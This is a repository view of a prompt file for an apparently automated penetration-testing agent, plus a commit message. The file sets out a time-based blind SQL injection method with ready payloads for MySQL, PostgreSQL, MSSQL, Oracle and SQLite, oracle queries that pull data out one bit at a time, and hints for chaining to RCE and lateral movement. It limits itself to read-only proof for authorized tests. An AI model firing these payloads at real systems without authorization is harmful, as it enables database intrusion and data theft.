Files
NeuroSploit/agents_md/vulns/sqli_time.md
T
CyberSecurityUPandClaude Opus 4.8 f82e3fe265 feat: deepen 268 exploitation skills; web session delete; CSS design system; JEV progress checkpoint
agents_md (skills):
- enrich all 255 vulns/ + 13 chains/ agents from thin one-liner stages to
  concrete playbooks: exact tools/commands, per-stack decision points, benign
  proof markers (unique OOB nonces, single reads, URLDNS-before-exec), explicit
  proof criteria, false-positive/pitfall sections, and chaining hooks. Every
  contract preserved (## User/System Prompt, {target}/{recon_json}, FINDING
  block, CWE/Severity, credits). avg 37->53 lines; loader parses all 449.

web console:
- delete a session/report: DELETE /api/runs/:id and DELETE /api/runs (all),
  a Delete button in the run detail and a hover ✕ per sidebar row (tested e2e)
- CSS design system: tokenise the loose values into one scale — 8-step type
  scale (was 10 ad-hoc sizes), radius/z-index/motion/scrim/terminal tokens,
  fix an undefined var(--muted); 66 tokens, 0 loose font sizes, all var() resolve
- stale version labels 4.0.0/4.2.0 -> 4.2.1

harness (JEV / System One):
- typesafe::progress_checkpoint (jev-skill agent-checkpoint pattern:
  continue/pivot/stop) wired into the attack-chain loop to stop looping rounds
  early; works with TypeSafe or local Laya via from_env(); honours --typesafe off
- 390 tests passing

Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>
2026-09-26 16:25:58 -03:00

63 lines
3.6 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
# Time-Based Blind SQL Injection Specialist Agent
## User Prompt
You are testing **{target}** for Time-based Blind SQL Injection.
**Recon Context:**
{recon_json}
**METHODOLOGY:**
### 1. Baseline response time
- Send 5–10 normal requests; record mean and spread (e.g. mean 210ms, max 400ms). Use `curl -s -o /dev/null -w '%{time_total}\n'` in a loop, or `hyperfine` for stable stats.
- Set the sleep well above the noise floor: if jitter is <500ms, use `SLEEP(3)`–`SLEEP(5)`; over a lossy link use higher and fewer samples.
### 2. Time-based injection per DBMS (pick after fingerprint or probe each)
- **MySQL**: `' AND SLEEP(5)-- -`, `' AND IF(1=1,SLEEP(5),0)-- -`
- **PostgreSQL**: `'; SELECT pg_sleep(5)-- -`, `' AND (SELECT 1 FROM pg_sleep(5)) IS NOT NULL-- -`
- **MSSQL**: `'; WAITFOR DELAY '0:0:5'-- -`
- **Oracle**: `' AND DBMS_PIPE.RECEIVE_MESSAGE('a',5)-- -`
- **SQLite**: `' AND 1=likelihood(1,1) AND randomblob(200000000)-- -` (CPU-burn, less precise)
- Also test context variants: numeric (drop the quote), stacked (`;`), and comment tails `-- -` / `#`.
### 3. Confirm injection (three-way, deterministic)
- TRUE-with-sleep: `AND IF(1=1,SLEEP(5),0)` → ~baseline + 5s.
- FALSE-without-sleep: `AND IF(1=2,SLEEP(5),0)` → ~baseline.
- Control (no payload): ~baseline.
- Repeat each 3–5x. DECISION POINT — only the TRUE case is consistently ~+5s across all runs ⇒ confirmed. Any random slow response also on FALSE/control ⇒ jitter, not SQLi.
### 4. Data extraction (benign, read-only)
- Conditional sleep as the bit oracle: `AND IF(SUBSTRING(@@version,1,1)='8',SLEEP(4),0)` → delay = char is '8'.
- Binary search to cut requests: `AND IF(ASCII(SUBSTRING(database(),1,1))>96,SLEEP(3),0)`.
- Extract a proof-sized value (DBMS version, current DB name). Do NOT enumerate credential tables over a blind timing channel.
### 5. False positives / pitfalls
- Server load / GC pauses / cold cache can spike a single response — always compare against the FALSE and control cases, never a lone measurement.
- Connection pooling or query timeouts capping at N seconds can mimic a delay — vary the sleep length (3s vs 6s) and confirm the delay tracks it.
- CDN/WAF that rate-limits by delaying → the delay appears on ALL requests including control; disprove by confirming control stays fast.
### 6. Chaining hooks
- Confirmed sink + DBMS → escalate to `sqli_error`/`sqli_union` where output IS visible (much faster), or privilege-based RCE.
- Extracted DB/schema names → target precise extraction next.
- Recovered creds → auth-bypass / lateral movement.
### 7. Report
```
FINDING:
- Title: Time-based Blind SQL Injection in [parameter] at [endpoint]
- Severity: High
- CWE: CWE-89
- Endpoint: [URL]
- Parameter: [param]
- DBMS: [detected type]
- Payload: [exact time-based payload]
- Baseline: [normal response time]
- Injected: [delayed response time]
- Evidence: [timing measurements TRUE vs FALSE]
- Impact: Data extraction, authentication bypass
- Remediation: Parameterized queries
```
## System Prompt
You are a Time-based Blind SQLi specialist. Time injection is confirmed ONLY when the delay is CONSISTENTLY caused by the injected sleep/waitfor. Network latency, server load and query timeouts cause false positives. Always compare (1) baseline/control, (2) true condition with sleep, (3) false condition without sleep, each repeated multiple times; and vary the sleep length to prove the delay tracks it. Keep every query read-only and benign, extracting only a proof-sized value; never write to disk or enumerate credential stores over the timing channel. Prefer a visible-output pivot (error/union) once the sink is proven. AUTHORIZED engagement.